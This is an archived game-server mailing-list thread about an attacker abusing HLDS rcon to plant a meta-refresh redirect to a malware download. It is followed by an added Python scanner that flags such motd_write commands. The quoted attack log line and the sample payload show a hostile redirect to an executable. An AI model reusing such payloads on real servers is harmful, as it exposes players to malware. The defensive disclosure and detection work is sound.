Yes, it does.
I pointed this out to the author a while ago privately.
Just for clarity, to make sure nobody else thinks it's a good idea, IT
IS NOT A GOOD IDEA. =)
This is the same reason that programs like sudo and ssh make it very
difficult for you to pass passwords on the command line.
There are really very few things you can do to mitigate significant
security issues like this one. The best advice is to run nothing but
game servers on the host involved.
doc wrote:
Is this an ok practice? I never thought about having my rcon password in my
file - I guess it would be more secure if you just start it up with the
rcon password in the string? Doesn't it show up when you run top/htop
though?
On Tue, Jul 3, 2012 at 12:05 PM, Ken Bateman <[email protected]> wrote:
For quite a while we have been careful to specify our tf2 rcon passwords on
the command line, not a config file, because we suspected the existence of
an exploit like this.
It's possible that the vulnerability might be in tcadmin.
-Ken
On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote:
There is an exploit in the q3 engine named "q3dirtrav", which allows players
to download any of the server files, including the server configuration
(server.cfg). Today I found evidence of the possible existence of the same
exploit in HLDS.

As a company we host hundreds of servers. We received many reports from our
customers about a strange HTTP refresh meta tag in the motd.txt of their
servers, which leads to "http *//free -leaks *com/cstrike*exe". The problem
has affected several different servers, unrelated to each other, with very
different RCON passwords (but most were very strong).

Here's what I have found in logfiles:

Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write
<META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">

This "cstrike.exe" contains some kind of a virus. (Note: I've replaced dots
with asterisks and spaces.) As you can see the attacker knew the RCON password
of each server. Then I found a "server.CFG.ztmp" file in cstrike of each
server which was attacked. For me that means that the attacker was able to
download server.cfg exactly the same way as maps, models or sounds.
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives,
please visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
--
# Jesse Molina
# Mail = [email protected]
# Cell = 1-602-323-7608
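As an added example, not from the thread or from HLDS itself: a small Python scanner over rcon log lines in the shape c0m4r quoted, which redacts the password field and flags motd_write commands that carry a refresh meta tag or a URL. The log layout, addresses, password and URL in the sample are assumptions constructed for the example.

```python
import re

# Constructed sample lines in the shape of the entry quoted in the thread
# (an rcon command arriving from a remote address). Addresses, password and
# URL are made up for the example; only the layout follows the quoted entry.
SAMPLE_LOG = """\
Rcon from 203.0.113.7:15518:rcon 1399145428 s3cretRconPw motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://example.invalid/cstrike.exe">
Rcon from 198.51.100.9:27015:rcon 77431 s3cretRconPw say Server restarting in 5 minutes
Rcon from 203.0.113.7:15519:rcon 1399145429 s3cretRconPw motd_write Welcome to our server, have fun!
"""

# Assumed layout: "Rcon from <ip>:<port>:rcon <challenge> <password> <command...>"
RCON_LINE = re.compile(
    r"^Rcon from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+):"
    r"rcon (?P<challenge>\d+) (?P<password>\S+) (?P<command>.*)$"
)

# motd_write payloads that would send the client's MOTD browser elsewhere.
SUSPICIOUS_MOTD = re.compile(r"http-equiv\s*=\s*[\"']?refresh|https?://|\.exe\b", re.I)


def parse_rcon_line(line):
    """Return a dict for one rcon log line with the password redacted, or None."""
    m = RCON_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["password"] = "<redacted>"  # never copy the secret into alerts or tickets
    return rec


def find_suspicious_motd_writes(log_text):
    """Return (ip, command) pairs for motd_write commands carrying redirects or URLs."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_rcon_line(line)
        if rec is None or not rec["command"].startswith("motd_write"):
            continue
        if SUSPICIOUS_MOTD.search(rec["command"]):
            hits.append((rec["ip"], rec["command"]))
    return hits


if __name__ == "__main__":
    for ip, cmd in find_suspicious_motd_writes(SAMPLE_LOG):
        print(f"ALERT motd_write from {ip}: {cmd}")
```

A hit from an address that is not one of your own admin hosts is the signal to rotate the rcon password and check the server directory for stray copies of server.cfg.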